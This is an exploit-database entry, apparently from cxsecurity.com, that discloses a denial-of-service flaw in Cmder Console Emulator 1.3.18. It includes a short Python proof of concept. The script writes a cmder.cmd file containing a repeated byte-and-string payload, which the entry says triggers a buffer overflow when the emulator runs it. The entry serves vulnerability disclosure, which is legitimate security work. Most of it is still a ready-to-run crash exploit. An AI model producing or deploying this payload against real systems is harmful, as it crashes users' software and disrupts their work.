Cmder Console Emulator 1.3.18 - Denial-of-Service (PoC)

2021.10.09
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Date: 2021-10-07 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://cmder.net # Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip # Version: v1.3.18 # Tested on: Windows 10 # [About - Cmder Console Emulator] : #Cmder is a software package created over absence of usable console emulator on Windows. #It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout. # [Security Issue] : #equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition. #E.g λ cmder.cmd # [POC] : PAYLOAD=chr(235) + "\\CMDER" PAYLOAD = PAYLOAD * 3000 with open("cmder.cmd", "w") as f: f.write(PAYLOAD)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top